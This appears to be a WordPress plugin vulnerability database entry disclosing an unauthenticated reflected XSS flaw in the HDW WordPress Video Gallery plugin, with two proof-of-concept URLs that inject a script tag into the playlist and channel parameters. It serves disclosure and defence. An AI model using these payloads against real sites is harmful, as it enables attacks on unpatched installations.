WordPress Plugin Vulnerabilities

HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"

http://www.example.com/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
Verified
No

Timeline

Publicly Published
2016-04-12 (about 8 years ago)
Added
2016-04-15 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other